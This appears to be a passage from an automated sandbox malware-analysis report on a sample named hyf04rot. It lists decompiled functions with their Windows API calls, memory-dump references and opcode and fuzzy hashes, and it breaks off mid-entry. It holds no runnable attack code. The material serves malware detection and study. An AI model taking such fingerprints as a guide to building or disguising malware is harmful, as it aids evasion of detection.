                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                                                                                                              • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                                                                                                                                                                              Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                                                                                                              • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                                                                                                                                                                              Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                                                                                                                                              • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                                                              • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                                                                                                              • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                                                                                                                                                                              Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                                                                                                              • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                                                                                                                                                                              Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                                              • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                                                                                                                                                                              Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                                                                                                              • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                                                                                                                                                                              Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                                                                                                              • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                                                                                                                                                                              Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                              • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                                                                                                              • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                                                                                                                                                                              Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                                                                                                              • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                                                                                                                                                                              Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                              • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                                                                                                              • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                                                                                                                                                                              Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
